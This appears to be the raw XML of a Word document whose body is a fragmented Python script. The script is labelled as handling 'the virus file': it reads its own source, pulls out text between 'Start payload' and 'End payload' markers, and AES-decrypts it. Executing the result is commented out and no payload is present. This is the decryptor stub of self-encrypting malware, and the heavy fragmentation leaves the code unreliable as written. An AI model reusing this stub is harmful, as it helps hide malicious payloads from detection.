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B8" w:rsidRPr="00B038B8" w:rsidRDefault="00B038B8" w:rsidP="00B038B8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</w:pP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os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__main__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base64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sys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StringIO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from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Crypto </w:t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Random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from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Crypto.Cipher </w:t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AES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Decryption function</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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decrypt(data):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this = open(__main__.__file__</w:t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B038B8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'r'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data = base64.b64decode(data);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iv = Random.new().read(AES.block_size)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cipher = AES.new(StringIO.StringIO(this).read(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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24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AES.MODE_CFB</w:t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iv)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this.close()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</w:t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return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cipher.decrypt(data)[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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16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:]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Gets the virus file</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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this = open(__main__.__file__</w:t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B038B8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'r'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copy = </w:t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False</w:t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cipher_payload = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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''</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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line </w:t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this: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</w:t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line.strip() == </w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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'# Start payload'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copy = </w:t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True</w:t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elif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line.strip() == </w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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'# End payload'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copy = </w:t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False</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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elif 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copy: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cipher_payload = cipher_payload + line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e = decrypt(cipher_payload[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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:])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#e = encrypt(cipher_payload)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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>#print e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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>#exec e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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sys.exit(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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'Good job!'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B038B8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B038B8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 End Unencrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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># Start payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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>#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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B038B8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  <w:t># End payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470742" w:rsidRDefault="00470742"/>
    <w:sectPr w:rsidR="00470742" w:rsidSect="0047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etBrains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038B8"/>
    <w:rsid w:val="00470742"/>
    <w:rsid w:val="00B0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3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38B8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2020-06-30T08:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-30T08:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>